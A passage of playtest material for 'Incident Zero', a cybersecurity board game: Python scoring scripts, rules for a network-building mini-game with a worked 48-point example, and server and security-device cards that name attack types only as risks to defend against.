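    segmented: bool = False     # Segmented or Fully Isolated architecture chosen
    redundancy: bool = False    # duplicate server in the same role, or Load Balancer
    spof: bool = False          # all critical services on one server
    missed_requirements: int = 0
    remote_work_drawn: bool = False
    adjustments: int = 0        # requirement/event bonuses and penalties from cards


def has_backup(d):
    return "Backup Server" in d.servers

def has_detection(d):
    return bool(d.devices & DETECTION)

def has_honeypot(d):
    return bool(HONEYPOTS & (set(d.servers) | d.devices))

def has_segmentation(d):
    return d.segmented or "Network Segmentation Switch" in d.devices


def module_score(d):
    """Network Building module card (max 40)."""
    met = sum(s in d.services for s in ("email", "web", "database", "identity"))
    pts = 2 * (met + has_backup(d))     # +2 per Required item, max +10
    pts += 10 if d.segmented else 0     # the architecture, not the switch
    pts += 5 if has_detection(d) else 0
    pts += 5 if has_backup(d) else 0
    pts += 5 if d.redundancy else 0
    if 5 <= d.budget_left <= 15:
        pts += 5                        # contingency reserve
    elif 1 <= d.budget_left <= 4:
        pts += 2
    return pts


def security_score(d):
    table = [(bool(d.devices & {"IDS", "IPS"}), 5), ("SIEM" in d.devices, 5),
             ("Firewall" in d.devices, 4), (has_backup(d), 4),
             ("Email Gateway" in d.devices, 3), ("WAF" in d.devices, 3),
             (has_honeypot(d), 3), (has_segmentation(d), 3)]
    return sum(p for present, p in table if present)


def budget_score(d):
    left = d.budget_left
    if 5 <= left <= 15:
        pts = 20
    elif 1 <= left <= 4:
        pts = 15
    elif left == 0 or 16 <= left <= 25:
        pts = 10
    else:
        pts = 5
    return pts // 2 if d.missed_requirements >= 2 else pts   # anti-hoarding check


CAPABILITY = {"email": 3, "web": 3, "database": 4, "file": 2, "identity": 3, "dev": 2}

def capability_score(d):
    pts = sum(p for s, p in CAPABILITY.items() if s in d.services)
    pts += 3 * has_backup(d) + 2 * ("VPN Gateway" in d.devices)
    pts += 2 * ("Cloud Workload" in d.servers) + has_honeypot(d)
    pts -= 5 * ("email" not in d.services) + 10 * ("database" not in d.services)
    pts -= 3 * ("identity" not in d.services)
    if d.remote_work_drawn and "VPN Gateway" not in d.devices:
        pts -= 3
    return pts


def resilience_score(d):
    pts = (8 if has_backup(d) else -10) + (7 if has_detection(d) else -3)
    pts += (3 if has_segmentation(d) else -2) + (5 if d.redundancy else 0)
    pts += 2 if has_backup(d) and has_detection(d) else 0   # Recovery Plan
    return pts - (5 if d.spof else 0)


def standalone_score(d):
    return (security_score(d) + budget_score(d) + capability_score(d)
            + resilience_score(d) + d.adjustments)


# The page's worked examples, re-entered as data.
TEAM_A = Design(["Email Server", "Web Server", "Database Server", "File Server",
                 "Backup Server"], {"Email Gateway"}, {"email", "web", "database", "file"}, 4)
TEAM_B = Design(["Email Server", "Web Server", "Database Server", "Domain Controller"],
                {"IDS"}, {"email", "web", "database", "identity"}, 3)
WALKTHROUGH = Design(["Web Server", "Database Server", "Backup Server", "Cloud Workload"],
                     {"IDS", "VPN Gateway", "Email Gateway"}, {"web", "database"}, 4,
                     missed_requirements=1, remote_work_drawn=True, adjustments=5 - 5)
SAMPLE_NETWORK = Design(["Cloud Workload", "Database Server", "Domain Controller",
                         "Backup Server"], {"Email Gateway"},
                        {"email", "web", "database", "identity", "file", "dev"}, 3, segmented=True)
```

Calling `standalone_score(TEAM_A)` reproduces the 37 above, `standalone_score(TEAM_B)` the 28, and `module_score(SAMPLE_NETWORK)` the 27 scored on the module's sample network.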
Each team:
- Separate budget (50 tokens each at Standard)
- Separate infrastructure tracking sheet
- Separate score tracker
Simultaneous Play:
- All teams reveal the same requirement and event at the same time
- Teams take turns choosing actions (round-robin) OR all teams act simultaneously
- Simultaneous is faster; rotating turns allows player agency
Track all teams' scores throughout game (illustrative):
| Team | Sec | Budget | Cap | Res | TOTAL |
|---|---|---|---|---|---|
| Team A | 8 | 20 | 12 | 5 | 45 |
| Team B | 12 | 15 | 18 | 10 | 55 |
| Team C | 5 | 10 | 8 | 2 | 25 |
Winner: Team with highest total score after the final turn
If two teams tie:
1. First tiebreaker: Security Score (defense is critical)
2. Second tiebreaker: Resilience Score (ability to survive matters)
3. Third tiebreaker: Capability Score (business requirement fulfillment)
Each game is different because:
Example Game Flow Variations:
Game 1 (Tough Start):
- Turn 1: Ransomware wave (REQ-12) → Must buy Backup + Detection early
- Turn 2: Budget cut (EVT-05) → Can't afford nice devices
- Turn 3: M&A integration (REQ-08) → Need more capacity
- Result: Teams forced into a defensive posture
Game 2 (Growth-Focused):
- Turn 1: Product launch (REQ-01) → Need Web Server
- Turn 2: Data acquisition (REQ-02) → Need Database
- Turn 3: Emergency funds (EVT-06) → +10 budget!
- Result: Teams build bigger, more capable infrastructure
Beginner Mode (Generous):
- Starting Budget: 60
- Kind decks (remove EVT-11 and REQ-12 before shuffling)
- Turn Limit: 7 (extra time)
Standard Mode:
- Starting Budget: 50
- Random card draws
- Turn Limit: 6
Advanced Mode (Challenging):
- Starting Budget: 40 (tight budget)
- Harsh decks (remove EVT-06, EVT-07, EVT-16 — fewer breaks)
- Requirement penalties doubled
- Turn Limit: 5
Phase 1: Business Requirement TO flips card: "New Product Launch Website — need modern web server capability. If missing by end of Q1: -5 points."
Phase 2: Operational Event TO flips card: "Emergency Funds! A surprise rebate arrives. +10 Budget (one time)."
Budget update: 50 + 10 = 60
Phase 3: Team Actions "We're deploying a Web Server to meet the launch requirement. Cost: 7 budget. Remaining: 53. We know we'll need a backup server eventually — holding the rest for now."
Phase 4: End of Turn
- Infrastructure: Web Server
- Budget: 53
Phase 1: Business Requirement "Customer Data Acquisition — must have a functioning Database by end of Q2 or lose 10 points."
Phase 2: Operational Event "Email Server Failure — pay 5 budget for emergency repair OR skip and lose 10 points."
The team has no email server, so the TO rules the event inert — there's nothing to break. (TO tip: when an event targets a component the team doesn't own, it fizzles — but it's a great moment to point at the capability gap.)
Phase 3: Team Actions "We're deploying a Database Server (10 budget) to handle the acquisition — that's critical. The failure event doesn't apply to us, so no repair cost. Total this turn: 10. Remaining: 43."
Infrastructure: Web Server, Database Server Budget: 43
Phase 1: Business Requirement "Ransomware Wave in Sector — you need Backup AND Detection capability OR lose 20 points."
Phase 2: Operational Event "Vendor Promotion — next security device this turn costs 2 less."
Phase 3: Team Actions "Critical quarter. We're deploying:
- Backup Server (9 budget)
- IDS at the promo discount (10 − 2 = 8 budget)
That satisfies the ransomware requirement. We'll also grab a Cloud Workload (4) for future flexibility. Total: 21 budget. Remaining: 22."
Infrastructure: Web, Database, Backup, IDS, Cloud Workload Budget: 22
Phase 1: Business Requirement "Work-From-Home Program — need remote access capability. Missing: -3 points."
Phase 2: Operational Event "IT Staff Burnout — you may deploy at most ONE component this turn."
Phase 3: Team Actions "We need remote access, and burnout limits us to one deployment. VPN Gateway it is (9 budget). Remaining: 13."
Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway Budget: 13
Phase 1: Business Requirement "Cyber-Insurance Renewal — Backup + Email Gateway + detection: +5 points if all present, -5 if not."
Phase 2: Operational Event "Hardware Recall — pick an on-prem server: pay 3 budget or it's offline this quarter."
Phase 3: Team Actions "We deploy an Email Gateway (6 budget) — with our Backup and IDS that completes the insurance checklist: +5 points. For the recall we pay 3 to keep the Database Server online (it's load-bearing). Total: 9. Remaining: 4."
Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway, Email Gateway Budget: 4
Phase 1: Business Requirement "Single Sign-On Rollout — must have a Domain Controller OR lose 5 points."
Phase 2: Operational Event "Quiet Quarter — no incident."
Phase 3: Team Actions "A Domain Controller costs 12; we have 4. We can't buy it. We pass and take the -5 penalty."
Final Infrastructure & Budget Check:
- Web Server (7)
- Database Server (10)
- Backup Server (9)
- IDS (10, paid 8 with promo)
- Cloud Workload (4)
- VPN Gateway (9)
- Email Gateway (6)
- Recall fee (3)
- Total spent: 7+10+9+8+4+9+6+3 = 56 of 60 available (50 start + 10 windfall)
- Final Budget: 4 remaining ✓
Security Score:
- IDS: +5
- Email Gateway: +3
- Backup Server: +4
- Total: 12 points
Budget Score:
- 4 remaining → 1-4 band
- Missed only 1 requirement (no halving)
- Total: 15 points
Capability Score:
- Web +3, Database +4, Backup +3, VPN +2, Cloud +2 = 14
- No Email service: −5 (an Email Gateway is a security device — it filters mail, it doesn't host mailboxes; they never deployed an Email Server or cloud email)
- No Domain Controller: −3
- Total: 6 points
Resilience Score:
- Backup Server: +8
- Detection (IDS): +7
- Recovery Plan (backup + detection): +2
- Flat network: −2
- Total: 15 points
Requirement/Event adjustments:
- Turn 5 insurance bonus: +5
- Turn 6 missed SSO requirement: −5
FINAL SCORE: 12 + 15 + 6 + 15 + 5 − 5 = 48 points
Lesson: This team survived the ransomware quarter and kept every event in check — but never bought email or identity. Detection and backups scored well; missing core business services bled capability points all game.
Servers may exceed capacity at +1 Budget per extra service. This is the same rule as the Network Building module.
- Example: 3 services on a 2-capacity server costs +1 budget
- Trade-off: cheaper than a new server now, but overloaded servers are recorded risks (single point of failure; events and later modules punish them)
Optional Rule: Allow teams to upgrade servers already deployed (swap for a better one, pay the difference).
- Example: Replace File Server (6) with Domain Controller (12) — pay 6, keep the hosted services
- Creates flexibility but adds complexity
Optional Rule (High Difficulty): If EVT-11 (Ransomware Strikes) is drawn and the team has NO Backup Server, they take the -20 immediately AND must deploy a Backup Server by the end of the next turn (mandatory).
- Creates an urgent decision point
- Teaches that failures have compounding consequences
Optional Rule: Each Legacy System deployed costs 1 extra budget per turn to maintain (not paid upfront).
- Teaches that cheap solutions have hidden costs
- Creates long-term vs. short-term thinking
NETWORK BUILDING STANDALONE SCORING (v2.2)
SECURITY SCORE (max 30):
IDS or IPS: +5 | SIEM: +5 | Firewall: +4 | Backup: +4
Email Gateway: +3 | WAF: +3 | Honeypot: +3 | Segmentation: +3
BUDGET SCORE (max 20) — smart utilization, not hoarding:
5-15 left: 20 | 1-4 left: 15 | 0 left: 10 | 16-25 left: 10 | 26+ left: 5
Missed 2+ requirements? Halve it (round down).
CAPABILITY SCORE (max 25):
Email: +3 | Web: +3 | Database: +4 | File: +2 | Domain: +3
Dev: +2 | Backup: +3 | VPN: +2 | Cloud: +2 | Honeypot: +1
Penalties: no Email -5 | no Database -10 | no DC -3
no VPN (if remote-work card drawn) -3
RESILIENCE SCORE (max 25):
Backup: +8 | Detection: +7 | Redundancy: +5 | Segmentation: +3
Recovery Plan (Backup AND Detection): +2
Penalties: no Backup -10 | single point of failure -5
no Detection -3 | flat network -2
FINAL = Security + Budget + Capability + Resilience
− requirement/event penalties (+ bonuses)
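The scoring rules above, applied to the team from the turn-by-turn worked example earlier on this page (final score 48), as an added Python example; this is not part of the game's own files. The card values are transcribed from the SERVERS, SECURITY DEVICES and scoring tables; the overload rule (+1 Budget per service beyond capacity) is folded into the budget calculation. Assumptions, since the page does not spell them out: the "Honeypot: +3" security line is read as the Honeypot Network device, the resilience "Detection" line accepts IDS, IPS, SIEM or Honeypot Network, "Redundancy" means a Load Balancer, and the single-point-of-failure penalty has no defined trigger on the page so the caller decides when it applies. The data layout and function names are this example's own.

```python
"""Scorer for the Network Building standalone mini-game (v2.2 rules as printed
on this page).  Added example, not part of the game's files; tables are
transcribed from the page, the layout and function names are our own."""

# Server cards: name -> (cost, capacity, capability points).
# Legacy earns no capability points on the page, so it is listed with 0.
SERVERS = {
    "Email": (8, 1, 3), "Web": (7, 1, 3), "Database": (10, 1, 4),
    "File": (6, 2, 2), "Domain": (12, 2, 3), "Dev": (5, 3, 2),
    "Backup": (9, 1, 3), "Cloud": (4, 2, 2), "Legacy": (3, 1, 0),
    "Honeypot": (7, 1, 1),
}

# Security devices: name -> (cost, security points, capability points).
# "IDS or IPS: +5" is awarded once (see security_score).  Assumption: the
# "Honeypot: +3" security line refers to the Honeypot Network device.
DEVICES = {
    "Firewall": (12, 4, 0), "IDS": (10, 5, 0), "IPS": (14, 5, 0),
    "Email Gateway": (6, 3, 0), "WAF": (11, 3, 0), "SIEM": (15, 5, 0),
    "Segmentation": (10, 3, 0), "VPN Gateway": (9, 0, 2),
    "Load Balancer": (8, 0, 0), "Honeypot Network": (8, 3, 0),
}

# Assumption: devices the page labels "detection" / "redundancy".
DETECTION = {"IDS", "IPS", "SIEM", "Honeypot Network"}
REDUNDANCY = {"Load Balancer"}


def remaining_budget(start, servers, devices, hosted=None, overrides=None, fees=0):
    """Budget left after deployment.  `hosted` maps a server to the number of
    services it runs (default 1); each service beyond capacity costs +1
    (overload rule).  `overrides` holds discounted prices actually paid,
    e.g. {"IDS": 8} after the Vendor Promotion event.  `fees` covers one-off
    event costs such as the Hardware Recall payment."""
    hosted, overrides = hosted or {}, overrides or {}
    spent = fees
    for s in servers:
        cost, capacity, _ = SERVERS[s]
        spent += overrides.get(s, cost) + max(0, hosted.get(s, 1) - capacity)
    for d in devices:
        spent += overrides.get(d, DEVICES[d][0])
    return start - spent


def security_score(servers, devices):
    pts = sum(DEVICES[d][1] for d in devices if d not in ("IDS", "IPS"))
    if "IDS" in devices or "IPS" in devices:
        pts += 5                      # awarded once even if both are present
    if "Backup" in servers:
        pts += 4                      # the Backup server scores under Security too
    return min(pts, 30)


def budget_score(remaining, missed_requirements):
    """Smart utilization band, halved (round down) if 2+ requirements were missed."""
    if 5 <= remaining <= 15:
        pts = 20
    elif 1 <= remaining <= 4:
        pts = 15
    elif remaining == 0 or 16 <= remaining <= 25:
        pts = 10
    else:
        pts = 5                       # 26+ left: hoarding
    return pts // 2 if missed_requirements >= 2 else pts


def capability_score(servers, devices, remote_work_drawn=False):
    pts = sum(SERVERS[s][2] for s in servers) + sum(DEVICES[d][2] for d in devices)
    pts -= 5 if "Email" not in servers else 0
    pts -= 10 if "Database" not in servers else 0
    pts -= 3 if "Domain" not in servers else 0
    if remote_work_drawn and "VPN Gateway" not in devices:
        pts -= 3
    return min(pts, 25)


def resilience_score(servers, devices, flat_network, single_point_of_failure=False):
    has_backup = "Backup" in servers
    has_detection = bool(DETECTION & set(devices))
    pts = (8 if has_backup else -10) + (7 if has_detection else -3)
    pts += 2 if has_backup and has_detection else 0     # Recovery Plan
    pts += 5 if REDUNDANCY & set(devices) else 0
    pts += 3 if "Segmentation" in devices else 0
    pts -= 5 if single_point_of_failure else 0          # trigger left to the caller
    pts -= 2 if flat_network else 0
    return min(pts, 25)


def final_score(servers, devices, remaining, *, missed_requirements=0,
                remote_work_drawn=False, flat_network=True,
                single_point_of_failure=False, adjustments=()):
    parts = {
        "security": security_score(servers, devices),
        "budget": budget_score(remaining, missed_requirements),
        "capability": capability_score(servers, devices, remote_work_drawn),
        "resilience": resilience_score(servers, devices, flat_network, single_point_of_failure),
        "adjustments": sum(adjustments),   # requirement/event bonuses and penalties
    }
    parts["final"] = sum(parts.values())
    return parts


def worked_example():
    """The team from this page's turn-by-turn example: 50 start + 10 windfall,
    IDS bought at the promo price, 3 paid for the Hardware Recall, one missed
    requirement, remote-work card drawn, flat network, +5/-5 adjustments."""
    servers = ["Web", "Database", "Backup", "Cloud"]
    devices = ["IDS", "VPN Gateway", "Email Gateway"]
    left = remaining_budget(60, servers, devices, overrides={"IDS": 8}, fees=3)
    return left, final_score(servers, devices, left, missed_requirements=1,
                             remote_work_drawn=True, adjustments=(+5, -5))


if __name__ == "__main__":
    print(worked_example())   # (4, {... 'final': 48})
```

Run it as-is to reproduce the 48-point result; swap in a team's own deployments (and `hosted={"File": 3}` for an overloaded File Server) to score a playtest table quickly.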
SERVERS (Cost / Capacity / Security Profile):
Email (8/1/Low) | Web (7/1/Low) | Database (10/1/Med)
File (6/2/Low) | Domain (12/2/Med) | Dev (5/3/Low)
Backup (9/1/High) | Cloud (4/2/Med) | Legacy (3/1/VLow) | Honeypot (7/1/Med)
Overload: +1 Budget per service beyond capacity
SECURITY DEVICES (Cost — benefit):
Firewall (12 — zone control) | IDS (10 — detection) | IPS (14 — detection+blocking)
Email Gateway (6 — anti-phishing) | WAF (11 — web app defense)
SIEM (15 — detection+logging) | Segmentation Switch (10 — isolation)
VPN Gateway (9 — remote access) | Load Balancer (8 — redundancy)
Honeypot Network (8 — detection/deception)
This is a complete, standalone 30-45 minute competitive mini-game.
To run a session:
1. Print server and device cards (cards/network-building/core-deck/)
2. Print the requirement and event decks (cards/network-building/standalone/)
3. Give each team a budget tracker
4. Run 5-7 turns (4-5 min each, per difficulty)
5. Calculate final scores
6. Declare winner
7. 10-minute debrief
Summary of changes for playtesters:
cards/network-building/standalone/; inline example lists replaced by references to them.
Incident Zero: Network Building Standalone Mini-Game. Infrastructure design competition with multi-dimensional scoring. v2.2 - Playtest Edition
cards/network-building/core-deck/server-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Server Cards represent the core computational systems that run your business. Each server has cost (Budget), capacity (how many services it can host), complexity, and security properties that affect network design.
SRV-01 Email Server
- Type: Business Critical
- Cost: 8 Budget
- Capacity: 1 service
- Complexity: 2/4
- Availability Requirement: 99.9% (almost always needed)
Description: Central email system (Exchange, Postfix, or cloud-based like Office 365). Handles all organizational communication. Commonly targeted by phishing and credential attacks. Must support spam filtering, encryption, and audit logging.
Key Concerns:
- Email spoofing and phishing vectors
- Credential compromise (email = access to password resets)
- Data exfiltration via email attachments and forwarding
- High user impact if unavailable
Defense Considerations:
- Requires Email Authentication (DMARC/SPF/DKIM)
- Benefits from DLP for sensitive email attachments
- Gateway filtering for phishing and malware
- MFA required for administrative access
Network Placement: DMZ or protected segment (external access required)
Interactions:
- Used with Asset Card "Email"
- References in Incident Response scenarios (T-01 Phishing, T-11 Browser Extension)
- Part of Disaster Recovery "critical services" list
SRV-02 Web Server
- Type: Business Critical
- Cost: 7 Budget
- Capacity: 1 service
- Complexity: 2/4
- Availability Requirement: 99.5% (critical during business hours)
Description: Public-facing web application server (Apache, Nginx, IIS). Hosts corporate website, customer portal, or SaaS application. Primary attack surface for web exploits (SQL injection, XSS, remote code execution).
Key Concerns:
- Web application vulnerabilities (OWASP Top 10)
- Unpatched framework or library exploits
- DDoS attacks targeting availability
- Code injection and remote execution
- Data exposure via web interface
Defense Considerations:
- Requires WAF (Web Application Firewall) for SQL injection/XSS prevention
- IPS for exploit signature detection
- Regular patching and vulnerability scanning
- Load balancer for availability
- TLS/SSL for data in transit
Network Placement: DMZ (external access required, isolated from internal systems)
Interactions:
- Used with Asset Card "Web"
- References in Incident Response scenarios (T-02 Watering Hole, T-05 Kernel Exploit)
- Load balancer reduces single point of failure
SRV-03 Database Server
- Type: Business Critical
- Cost: 10 Budget
- Capacity: 1 service
- Complexity: 3/4
- Availability Requirement: 99.9% (critical for business operations)
Description: Relational or NoSQL database (SQL Server, PostgreSQL, MongoDB, Oracle). Stores customer data, financial records, operational data. Highest value target after compromise—contains the "crown jewels."
Key Concerns:
- SQL injection attacks
- Credential abuse (weak database admin passwords)
- Lateral movement target (pivot point)
- Unencrypted data at rest
- Unencrypted data in transit
- Unauthorized data access and exfiltration
Defense Considerations:
- Requires Network Segmentation to limit access
- Credential Guard and strong authentication
- Database activity monitoring (DAM)
- TLS for all connections
- Data encryption at rest
- Regular backups with immutability
- Connection string in vault (not hardcoded)
Network Placement: Restricted segment (only authorized systems can connect)
Interactions:
- Used with Asset Card "Database"
- References in Incident Response scenarios (T-04 Lateral Movement, T-10 SQL Exfiltration, T-11 Browser Extension)
- Critical for Disaster Recovery backup and recovery
SRV-04 File Server
- Type: Business Critical
- Cost: 6 Budget
- Capacity: 2 services
- Complexity: 2/4
- Availability Requirement: 99% (needed during business hours)
Description: File storage and sharing system (SMB/CIFS, NFS, or cloud file sharing). Stores shared documents, project files, compliance records. Often contains both sensitive and non-sensitive data mixed together.
Key Concerns:
- SMB lateral movement attacks
- Excessive file permissions (everyone can read everything)
- Ransomware encryption of shares
- Unauthorized file access and data theft
- Compliance violations (PII, PHI, PCI data stored unencrypted)
- Uncontrolled data growth and backup challenges
Defense Considerations:
- Network Segmentation to limit SMB access
- File permissions auditing and hardening
- DLP for sensitive file detection
- Immutable snapshots for ransomware recovery
- Encryption at rest
- Access logging and monitoring
Network Placement: Protected segment (limited internal access only)
Interactions:
- Used with Asset Card "File Storage"
- Target of T-04 Lateral Movement in Incident Response
- Critical dependency for Disaster Recovery
SRV-05 Domain Controller
- Type: Business Critical
- Cost: 12 Budget
- Capacity: 2 services
- Complexity: 3/4
- Availability Requirement: 99.5% (core infrastructure dependency)
Description: Active Directory or LDAP domain controller. Master repository of all user identities, credentials, and group memberships. Most powerful target in the organization—compromise of a DC gives the attacker control of the entire directory.
Key Concerns:
- Credential dumping (Mimikatz targets LSASS on DC)
- Pass-the-hash attacks
- Unauthorized privilege escalation
- DC compromise = organization is fundamentally compromised
- Backup DC synchronization complications
- Can be both on-premises and cloud (Azure AD)
Defense Considerations:
- Credential Guard to protect LSASS
- Privileged Access Workstation (PAW) for DC admin access
- Strong authentication (MFA) for all DC access
- Network Segmentation (DC in restricted tier)
- Backup DC in geographically separate location
- Regular backup and recovery testing
Network Placement: Restricted segment (admin-only access)
Interactions:
- Used with Asset Card "Identity"
- Central to Incident Response investigation (T-06 Mimikatz, T-04 Lateral Movement)
- DC compromise immediately loses the game (organizational control lost)
- Critical for Disaster Recovery restore procedures
SRV-06 Development Server
- Type: Business Important
- Cost: 5 Budget
- Capacity: 3 services
- Complexity: 2/4
- Availability Requirement: 80% (nice to have, can work around)
Description: Development and testing environment for software development. Lower security requirements than production but often contains production-like data (for testing). Developers need broad access for testing purposes.
Key Concerns:
- Overly permissive developer access
- Production data in dev (compliance violations)
- Outdated/unpatched tools (focus on development, not security)
- Lateral movement springboard to production
- Code repository contains source code (intellectual property)
- Test credentials and API keys hardcoded
Defense Considerations:
- Separate dev database from production database (never use prod data)
- Firewall rules to prevent dev→prod lateral movement
- Code repository security (secrets scanning, access control)
- Regular cleanup of test data
- MFA for dev server access
- Audit logging of developer activities
Network Placement: Development segment (isolated from production)
Interactions:
- Used with Asset Card "Development"
- Often overlooked security risk (compliance gap in Audit module)
- Lateral movement target (attacker compromises dev to move to prod)
SRV-07 Backup Server
- Type: Business Critical (Different Tier)
- Cost: 9 Budget
- Capacity: 1 service
- Complexity: 2/4
- Availability Requirement: 95% (needed for recovery scenarios)
Description: Backup and archival storage system (dedicated appliance, NAS, or cloud backup like Veeam, Commvault, or Backblaze). Stores point-in-time copies of all critical systems. The ultimate recovery mechanism for ransomware, disasters, and destructive attacks.
Key Concerns:
- Backup corruption or compromise (renders backups useless)
- Ransomware targeting backup systems
- Backup media not separated from primary systems
- Backups not regularly tested (recovery fails when needed)
- Immutability not enforced (backups can be modified)
- Access control: who can restore? Who can delete?
Defense Considerations:
- CRITICAL: 3-2-1 backup strategy: 3 copies, 2 media types, 1 offsite
- Immutable backups (WORM - Write Once Read Many)
- Encryption at rest and in transit
- Backup testing schedule (quarterly minimum)
- Separate backup credentials (not domain-linked)
- Offsite backup location (geographically separated)
- Backup media inventory and audit log
Network Placement: Restricted segment + offsite (separate from primary network)
Interactions:
- Used with Asset Card "Disaster Recovery"
- Critical for Disaster Recovery module (backup resilience determines recovery speed)
- If backup is missing or compromised, the team automatically FAILS the Disaster Recovery requirement (v2.2) — a CRITICAL gap carried into other modules
- Incident Response mentions backup verification in defenses
SRV-08 Cloud Workload
- Type: Increasingly Business Critical
- Cost: 4 Budget
- Capacity: 2 services
- Complexity: 2/4 (but different concerns than on-premises)
- Availability Requirement: 99% (vendor manages SLA)
Description: Cloud-hosted application or service (AWS EC2, Azure VM, GCP Compute Engine, or fully managed service like Lambda, Cloud Run). Shifts some infrastructure management to the cloud provider but introduces new security concerns.
Key Concerns:
- Misconfigured security groups/network ACLs (open to internet)
- Cloud credentials compromise (AWS IAM keys stolen)
- Instance metadata service attacks (AWS IMDS exploitation)
- Cross-account or cross-tenant access (shared infrastructure)
- Cloud-specific vulnerabilities (API, permissions models)
- Data residency and compliance (where is data stored?)
Defense Considerations:
- Cloud-native security tools (AWS Security Hub, Azure Security Center)
- Proper IAM configuration (least privilege for cloud roles)
- Network security groups with default-deny
- Cloud workload protection (container runtime security)
- VPC and subnet isolation
- Encryption of cloud data
Network Placement: Cloud provider network (separate from on-premises, connected via VPN)
Interactions:
- Used with Asset Card (varies—Email in cloud, Web in cloud, etc.)
- Network design must include cloud connectivity (VPN or Direct Connect)
- Audit module assesses cloud security posture
- Cloud-specific Incident Response and Hardening challenges
SRV-09 Legacy System
- Type: Business Important (Legacy)
- Cost: 3 Budget
- Capacity: 1 service
- Complexity: 3/4 (difficult to maintain, patch, or secure)
- Availability Requirement: 90% (supported but aging)
Description: Aging system running an outdated OS (Windows XP, older Linux, proprietary systems) or custom applications. Cannot be easily patched due to compatibility issues, the vendor no longer supporting it, or a critical business process depending on it.
Key Concerns:
- Cannot patch due to vendor EOL (End of Life)
- Incompatible with modern security tools (EDR won't run)
- No TLS support (unencrypted traffic)
- Known, publicly disclosed vulnerabilities with no fix
- Business relies on it despite security risk
- Migration cost exceeds security benefit (economically trapped)
Defense Considerations:
- CRITICAL: Network Segmentation isolates the legacy system
- Firewall rules restrict legacy system traffic
- Assume compromise and defend the segmented network (not the legacy system itself)
- Monitor the legacy system for suspicious activity (can't detect on the system, detect on the network)
- Immutable backups to restore if compromised
- Plan legacy system retirement
Network Placement: Isolated segment (strict firewall rules, minimal connectivity)
Interactions:
- Used if organization has legacy infrastructure
- Audit module finds legacy systems as critical findings
- Network design: "assume legacy is compromised, defend around it"
- Expansion deck explores legacy system challenges
SRV-10 Honeypot
- Type: Security Tool (Non-Business)
- Cost: 7 Budget
- Capacity: 1 service (decoy only — hosts no real business service)
- Complexity: 1/4 (purposefully simple and unmonitored-looking)
- Availability Requirement: N/A (false resource)
Description: Deliberately exposed fake server or user account designed to detect compromise and lateral movement. Appears to be a real business resource but is actually a trap. Any access to the honeypot indicates active attacker activity (zero false positives).
Key Concerns:
- Placement visibility (attacker must discover it to trigger it)
- Believability (must look like a real system worth attacking)
- Monitoring (honeypot access must be logged securely)
- Honeypot maintenance (must not appear unmaintained)
- Response procedures (what do we do when the honeypot is triggered?)
Defense Considerations:
- Canary tokens (watermarked documents, fake credentials)
- Fake administrative account (admin account that isn't really admin)
- Fake file server with sensitive-looking shares
- Fake VIP email addresses on mailing lists
- Alerting on any access to honeypot (immediate incident response)
Network Placement: Among legitimate resources (cannot appear isolated)
Interactions:
- Used with Deception Technology defense card in Hardening
- Network design: "place honeypots where attackers will likely look"
- Zero false positives: any honeypot access = real attack
- Expansion deck discusses advanced honeypot strategies
| Card | Server Type | Cost | Capacity | Complexity | Availability | Key Risk |
|---|---|---|---|---|---|---|
| SRV-01 | Email Server | 8 | 1 | 2/4 | 99.9% | Phishing, Credential Abuse |
| SRV-02 | Web Server | 7 | 1 | 2/4 | 99.5% | Web Exploits, RCE |
| SRV-03 | Database Server | 10 | 1 | 3/4 | 99.9% | SQL Injection, Data Exfil |
| SRV-04 | File Server | 6 | 2 | 2/4 | 99% | SMB Lateral Movement, Ransomware |
| SRV-05 | Domain Controller | 12 | 2 | 3/4 | 99.5% | Mimikatz, Complete Compromise |
| SRV-06 | Development | 5 | 3 | 2/4 | 80% | Lateral Movement, Data Leak |
| SRV-07 | Backup Server | 9 | 1 | 2/4 | 95% | Ransomware, Recovery Failure |
| SRV-08 | Cloud Workload | 4 | 2 | 2/4 | 99% | Misconfiguration, IAM Abuse |
| SRV-09 | Legacy System | 3 | 1 | 3/4 | 90% | Known Vulns, Cannot Patch |
| SRV-10 | Honeypot | 7 | 1 | 1/4 | N/A | Detection, Early Warning |
Each server fulfills one or more Asset Card requirements:
- SRV-01 → Asset "Email"
- SRV-02 → Asset "Web"
- SRV-03 → Asset "Database"
- SRV-04 → Asset "File Storage"
- SRV-05 → Asset "Identity"
- SRV-06 → Asset "Development"
- SRV-07 → Asset "Disaster Recovery"
- SRV-08 → Asset (varies—could be Email, Web, Database in cloud)
- SRV-09 → Asset (legacy system supporting specific business function)
- SRV-10 → Security monitoring (not a business requirement)
Network Building Module: Server Cards. Part of Incident Zero, a modular cybersecurity board game. v2.2 - Playtest Edition
cards/network-building/core-deck/security-device-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Security Device Cards represent network security appliances and tools that control traffic, detect threats, and enforce policies between network segments.
SEC-01 Firewall (Perimeter)
- Type: Perimeter Control
- Cost: 12 Budget
- Placement: Network edge (between internet and internal network)
- Primary Function: Block unauthorized inbound/outbound traffic
Description: Traditional stateful firewall (Cisco ASA, Palo Alto Networks, Fortinet FortiGate) at the network perimeter. Enforces allow/deny rules based on source IP, destination IP, protocol, and port. First line of defense against external attacks.
What It Protects Against:
- Unauthorized inbound access attempts
- Unauthorized outbound connections (C2 beaconing, data exfiltration)
- Network reconnaissance from internet
- DDoS attacks (basic flood protection)
What It Doesn't Protect Against:
- Application-layer attacks (SQL injection, XSS)
- Lateral movement within the network (perimeter placement; operates at L3/L4 only)
- Encrypted traffic inspection (needs deep packet inspection)
- Insider threats or authorized-but-malicious access
Network Interactions:
- Required for: Most organizations (perimeter protection is baseline)
- Works with: Web Server (must allow inbound HTTP/HTTPS), Email Server (SMTP/POP3/IMAP)
- Supports: Database (prevents inbound database connections from internet)
Ruleset Complexity: Medium (5-10 rules for basic setup, 50+ for mature organization)
Performance Impact: Minimal for small networks, can become bottleneck at scale
SEC-02 IDS
- Type: Threat Detection
- Cost: 10 Budget
- Placement: Internal network (behind firewall, in front of critical systems)
- Primary Function: Detect suspicious network traffic patterns
Description: Network-based IDS (Snort, Zeek, Suricata) that inspects all traffic and alerts on suspicious patterns. Uses signature matching and/or behavioral analysis to identify known attacks and anomalous traffic.
What It Protects Against:
- Known attack patterns (exploits, vulnerability scans)
- Port scanning and reconnaissance
- Lateral movement (SMB, RDP abuse)
- Data exfiltration patterns (unusual volume, unusual destination)
- Command & Control (C2) communication
What It Doesn't Protect Against:
- Zero-day exploits (no signature exists)
